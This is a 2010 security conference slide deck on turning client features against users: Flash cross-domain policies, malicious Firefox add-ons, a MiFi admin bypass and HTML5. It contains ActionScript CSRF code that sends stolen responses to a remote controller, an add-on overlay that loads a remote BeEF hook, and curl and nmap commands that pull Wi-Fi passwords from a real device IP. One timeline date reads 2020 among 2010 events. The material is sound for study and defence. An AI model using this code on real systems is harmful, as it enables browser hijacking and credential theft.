The Friendly Traitors 



Mike Poor 

- Packet Ninja 



Kevin Johnson 

- Web Pen-Test Samurai 




Justin Searle 

- Smart Grid Sensei 





Copyright 2010 InGuardians, Inc. 






Typical Attack Focus 




Risk management commonly focuses on 
vulnerabilities 

- OS & Application 

- Network 

- Infrastructure 

Most of our infrastructure and policies 
are designed for this 

Not that this isn't important... 

- Just not our focus today 
Client-Side Attacks 

The other commonly referenced attacks are client vulnerabilities 

- Browser flaws 
- Adobe Reader 
- APT ... It's not just a package manager 

More of a focus in recent tests 

Many different attacks are usable in 
this context 
What Makes a Friendly Traitor 

Features! Features! Features! 






Client applications are including 
complex extendable features 

- Read that as more vulnerable 

Let's focus on using these 
features against the users 

- Use the client support to run code to perform fun and powerful attacks 




Security Control Failure 

Most of our controls are focused on 
exploits 

- Detection of the exploits 

- Prevention of these attacks 




These fail to detect the malicious 
features! 
So let's talk about a few 

We are going to focus on a few 
examples 

Keep in mind, these are examples 
you can build from 

- Using features of the client application 

We will be releasing some of these 
examples 
Adobe Flash 

Flash 





Let's make our pages "flash" 
Most people think animations 

- But ActionScript adds powerful feature sets 

Wide-spread support for the SWF 
objects 

-Except in Cupertino ;-) 







Cross Domain 




Flash objects are able to make HTTP requests 

Many developers use this to provide mash-up 
capabilities 

- Or to process data from the server application 

Flash uses a different policy to control this 
than JavaScript 

- Same Origin policy is ignored 

- By default Flash behaves the same way though 
Cross Domain Policy 




These restrictions were added in Flash 7 

Prevents loading data from any server except 
the origin server 

- Similar to the same origin policy 

The big difference is that it is server 
controllable 

- crossdomain.xml file most likely in the web root 

- Controlled by the server admin or developer 




Using a cross-domain policy file could expose your site to various attacks. 
Please read this document before hosting a cross-domain policy. 
Crossdomain.xml 




XML file placed in the web root 

- or within the directory the content is loaded from 

Controls which domains are able to access 
content FROM this server 

Allows for the wildcard * 

- *.inguardians.com will match 

• www.inguardians.com 

• inguardians.com 

• eds.secretroom.inthe.secretroom.inguardians.com 
Concerns 




Concerns about this file have been 
raised in the past 

Adobe says their documentation is 
sufficient 

- The Adobe web site hosts instructions and 
tutorials 

We have found a number of security 
problems in their site documents 

- SQL injection is common 
[Screenshot of the Adobe Developer Connection article "Using ActionScript 3.0 to retrieve MySQL data using a server-side ASP script"; the right edge of the text is cut off in the screenshot] 

Sending the XML to the ASP script 

Once you know how to set up a connection and send data from Flash to the wo... XML to the ASP script is pretty easy. This section covers sending the data to a... ASP script using a simple HTTP POST. To make sending XML data easier I wr... sendSQLXML function: 



// Adobe's sample as shown on the slide: the raw SQL fragment supplied by the
// client is wrapped in XML and POSTed to the server-side script unchanged.
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLRequestMethod;
import flash.net.URLVariables;

public function sendSQLXML(aspURL:String, SQLXML:String,
                           returnSQLXMLCallback:Function):void
{
    var myXMLURL:URLRequest = new URLRequest(aspURL);
    var variables:URLVariables = new URLVariables();
    variables.xmlSQL = "<MySQLRequest>" + SQLXML + "</MySQLRequest>";
    myXMLURL.data = variables;
    myXMLURL.method = URLRequestMethod.POST;
    var myLoader:URLLoader = new URLLoader();
    myLoader.addEventListener("complete", returnSQLXMLCallback);
    myLoader.load(myXMLURL);
}
Scanner Script 




Simple python script 

Read the Alexa Top 1 
million domains list 

Compared the domain to 
the Google Safe Site list 

- If listed, it was discarded 

We then retrieved the 
crossdomain.xml and 
parsed it 



# Reconstructed from the slide screenshot (the original was Python 2).
# Lookup is the Google Safe Browsing lookup client the script used; its
# import line sits above the part of the script shown on the slide.
import csv
import sys
import xml.dom.minidom
from urllib.error import URLError
from urllib.request import Request, urlopen

# The file-name assignments are not on the slide; taken from argv here.
domainFile, outputFile, malwareOutputFile = sys.argv[1:4]

output = open(outputFile, "a", encoding="ascii", errors="replace")
malwareoutput = open(malwareOutputFile, "a", encoding="ascii", errors="replace")
siteList = csv.reader(open(domainFile))      # Alexa rows are "rank,domain"
l = Lookup()

for site in siteList:
    siteName = "".join(["http://www.", site[1]])
    lookupResult = l.lookup_by_url(siteName)
    if lookupResult is None:                 # not on the Safe Browsing list
        url = "".join([siteName, "/crossdomain.xml"])
        req = Request(url)
        try:
            response = urlopen(req)
        except URLError as e:
            response = None
        else:
            try:
                dom = xml.dom.minidom.parseString(response.read())
            except Exception:
                pass                         # not a parseable policy file
            else:
                url_list = dom.getElementsByTagName("allow-access-from")
                print("***%s***" % site[1])
                output.write("\n%s," % site[1])
                for url in url_list:
                    url = url.getAttribute("domain")
                    # print(url)
                    output.write("[d]%s," % url)
                url_list = dom.getElementsByTagName("site-control")
                for url in url_list:
                    url = url.getAttribute("permitted-cross-domain-policies")
                    output.write("[p]%s," % url)
                url_list = dom.getElementsByTagName("allow-http-request-headers-from")
                for url in url_list:
                    domain = url.getAttribute("domain")
                    headers = url.getAttribute("headers")
                    url = "".join([domain, "(", headers, ")"])
                    output.write("[h]%s," % url)
                url = None
                url_list = None
                response = None
                req = None
    else:
        malwareoutput.write("%s," % site[1])
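Added example, not code from the talk: a checker that applies the Flash wildcard matching described on the Crossdomain.xml slide and audits a single policy file offline for the entry classes the scanner above collects (wildcards, RFC 1918 and localhost hosts, intranet names, header grants, site-control). The sample policy is constructed, and the single-label "internal name" rule is an assumption.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample policy for this demo (not one of the scanned sites)
SAMPLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*.inguardians.com"/>
  <allow-access-from domain="192.168.1.10" secure="false"/>
  <allow-access-from domain="localhost"/>
  <allow-access-from domain="intranet"/>
  <allow-http-request-headers-from domain="*" headers="SOAPAction"/>
</cross-domain-policy>"""

def flash_domain_matches(pattern, host):
    """Slide rule: '*.example.com' matches example.com and any subdomain depth."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return host == pattern

def is_internal_name(domain):
    """RFC 1918/loopback IP, 'localhost', or single-label name (assumed heuristic)."""
    try:
        ip = ipaddress.ip_address(domain)
        return ip.is_private or ip.is_loopback
    except ValueError:
        return domain == "localhost" or "." not in domain

def audit_policy(xml_text):
    """(category, value) findings for the entries the scan flagged."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.findall("allow-access-from"):
        d = el.get("domain", "")
        if d == "*":
            findings.append(("any-domain", d))
        elif is_internal_name(d):
            findings.append(("internal-host", d))
        if el.get("secure") == "false":   # lets http:// SWFs read an https:// site
            findings.append(("insecure", d))
    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append(("any-domain-headers", el.get("headers", "")))
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        findings.append(("site-control", "all"))   # any policy file on the host is honoured
    return findings
```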
Results from the scan 

[Chart from the slide with the values 2,156 / 15,104 / 39,990; the bar labels are not legible in the scan] 
Boneheads FTW! 

[Chart from the slide with the counts 843, 515 and 47 and the labels rfc1918, localhost and intranet] 
Weaponizing Flash 




Now we can build 
ActionScript to abuse this 

The SWF file can make 
requests to the discovered 
sites 

- XSRF attacks 

We also control this SWF 
file remotely 

- Similar to browser hooking 



// Reconstructed from the slide screenshot; the controller URLs are cut off
// at the right edge of the slide and are left as they appear there.
import flash.events.Event;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLRequestMethod;

public function sendCSRFAttack(csrfURL:String, method:String, payload:String,
                               returnResponseCallback:Function):void
{
    // currently only works with POST -- Kevin
    var myURL:URLRequest = new URLRequest(csrfURL);
    myURL.data = payload;
    myURL.method = URLRequestMethod.POST;
    var myLoader:URLLoader = new URLLoader();
    myLoader.addEventListener("complete", returnResponseCallback);
    myLoader.load(myURL);
}

public function returnResponse(evtObj:Event):void
{
    // Return response from attacked server to controller script
    var response:String = evtObj.target.data;
    // Now to send this to my controller (URL cut off on the slide)
    var controllerURL:URLRequest = new URLRequest("http://flash.");
    controllerURL.data = response;
    controllerURL.method = URLRequestMethod.POST;
    var ctrlrLoader:URLLoader = new URLLoader();
    ctrlrLoader.addEventListener("complete", retrieveCSRFCommand);
    ctrlrLoader.load(controllerURL);
}

// Registered as a "complete" listener above, so it must accept the Event
public function retrieveCSRFCommand(evtObj:Event = null):void
{
    // Get the CSRF victim from controller (URL cut off on the slide)
    var cmdURL:URLRequest = new URLRequest("http://flash.secure-");
    cmdURL.method = URLRequestMethod.GET;
    var cmdLoader:URLLoader = new URLLoader();
    cmdLoader.addEventListener("complete", parseCSRFCommand);
    cmdLoader.load(cmdURL);
}



http://www.inguardians.com/tools 
public function parseCSRFCommand(evtObj:Event):void
{
    // parse the CSRF Command and then call the sendCSRFAttack
    var cmdResponse:String = evtObj.target.data;
    // The split separator and the rest of this function are cut off on the slide
    var arrayRequestPieces:Array = cmdResponse.split(
Browsers 

Mozilla Add-Ons 




Mozilla is a great browser 

- Not just as a pen-tester 

Add-ons are one of the 
reasons 

- Extend the browser 

- Provide great (and odd) features 
Destroy the Web 
by jose.bolanos 




Turn any web page into a shoot-em up video game. 

With a pulse pounding soundtrack and high scores for every web page, 

Destroy the Web is a fun way to take a little break during the day. 
Browser Uptime 

by Cosmic Cat Creations 

Report the duration of your current browser session. 



Zombify My Browser 

[Screenshot of the add-on's directory layout] 

chrome/ 
    content/ 
chrome.manifest 
defaults/ 
    preferences/ 
install.rdf 
locale/ 
    en-US/ 
skin/ 

Let's build an add-on that is 
malicious 

Simple to build 

- Well simple to make it malicious ;-) 



We add a browser 
hook 

• BeEF by Wade Alcorn 

This browser is now 
a zombie 



<?xml version="1.0"?>
<?xml-stylesheet href="chrome://linktargetfinder/skin/skin.css" type="text/css"?>
<!DOCTYPE linktargetfinder SYSTEM "chrome://linktargetfinder/locale/translations.dtd">
<overlay id="sample" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

  <script src="linkTargetFinder.js" />

  <!-- the added line: a remote BeEF hook script loaded into browser chrome -->
  <script src="http://beef.secureideas.net/beef/hook/beefmagic.js.php" />

  <!-- attributes cut off at the right edge of the slide are omitted below -->
  <menupopup id="menu_ToolsPopup">
    <menuitem label="&runlinktargetfinder;" key="link-target-finder-run-key" />
  </menupopup>

  <keyset>
    <key id="link-target-finder-run-key" modifiers="accel alt shift" />
  </keyset>

  <statusbar id="status-bar">
    <statusbarpanel id="link-target-finder-status-bar-icon" />
  </statusbar>

  <toolbarpalette id="BrowserToolbarPalette">
    <toolbarbutton id="link-target-finder-toolbar-button" label="Link Target Finder" />
  </toolbarpalette>

</overlay>
YourFi is MiFi 

MiFi POwnage History 




January 14, 2010 

- @adam_baldwin finds several flaws in the web admin page including Auth Bypass, CSRF, and XSS 

- http://evilpacket.net/2010/jan/14/mifi-geopwn/ 

January 16, 2010 

- @aramosf discovers the config file is accessible via the Auth Bypass 
vuln 

February 2, 2020 

- @joswright discovers the default password selection is weaker than it appears and creates pre-computed hash tables for all default SSID/password combinations 

- http://www.willhackforsushi.com/?p=417 

Today ... 
Beware of Odd Defaults 




Odd port forward 
setting hidden in default 
MiFi settings 

Any decent admin or 
security professional will 
immediately disable this 

If you change your 
WLAN's default IP 
address range, this 
setting gets disabled 

So who cares... 




[Screenshot of the MiFi web admin (Novatel Wireless MiFi2200 VZW, "Verizon EvDO Rev. A Connected"), Home > WiFi > LAN > Security > Port Forwarding] 

Port Forwarding Applications 
- DNS (Domain Name Server) 
- FTP Server 
- HTTP (Web) Server 
- NNTP Server 
- POP3 Server 
- SMTP Server 
- SNMP Server 
- Telnet Server 
- TFTP Server 

IP Address on WLAN: 192.168.1.254 

[Apply] [Revert] 





Auth Bypass from the Internet! 




When this port forward is removed or disabled MiFi 
exposes web admin to the cellular interface 

All the existing web app flaws are now exploitable 
from the Internet 

So how does an attacker exploit this in large scale? 



[Terminal screenshot: justin@sauron ~ (ssh)] 

justin@sauron:~$ ##### With http port forward to Never Never Land 
justin@sauron:~$ curl -sm5 http://75.226.226.1/config.xml.sav | grep password 
justin@sauron:~$ 
justin@sauron:~$ ##### With http port forward disabled 
justin@sauron:~$ curl -sm5 http://75.226.226.1/config.xml.sav | grep password 
<password>http://bit.ly/4kb77v</password> 
justin@sauron:~$ 
From 0 to 60 in NSE seconds 




Attackers will scan for them of course! 

Verizon's IP address range for MiFi devices is a /10 
network or 4,194,304 IP addresses in size 

Nmap can pull this off in less than two days 






justin@sauron:~$ nmap -PN -p 80 --script http-mifi.nse 75.226.226.1 

Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-05 23:15 MST 
Interesting ports on 1.sub-75-226-226.myvzw.com (75.226.226.1): 
PORT   STATE SERVICE 
80/tcp open  http 
| http-mifi: MIFI Device Found!!! 
|   Password = "http://bit.ly/4kb77v" 
|   SSID = "Verizon MiFi2200 7E6C" 
|_  PSK = "09113431896" 

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds 



Re-Joining the Asylum 




Currently, the only way to fix this is to re-enable the HTTP port 
forward to Never Never Land. 

- Make sure you use a VALID and UNUSED IP address in your 
WLAN range 

- Make sure you change this port forward every time you change 
your WLAN IP address range 

Remember that this port forward does not prevent people on your WLAN network from exploiting these flaws 

- Never use the "Hotspot" mode until these vulns are fixed 

Suck it up and connect your MiFi through the USB port 
occasionally 

- This is the only "known" way to update your MiFi's flash 

- This avoids the risk of exposing your MiFi's web admin interface ... 
at least that is the current assumption 
HTML 5 

And Now... HTML5 




5th revision of HTML 

One main focus is the idea of web 
applications 

- Keep in mind this is a client language 

Browsers are being given more power and 
features 




- SQL Database 
- Web Storage 
- File Access 
- Device Access 
- Web Sockets 
- System Information 



And the idiocy continues... 
Thank You! 



Mike Poor - mike@inguardians.com - @mike_poor 



Kevin Johnson - kevin@inguardians.com - @secureideas 



Justin Searle - justin@inguardians.com - @meeas 




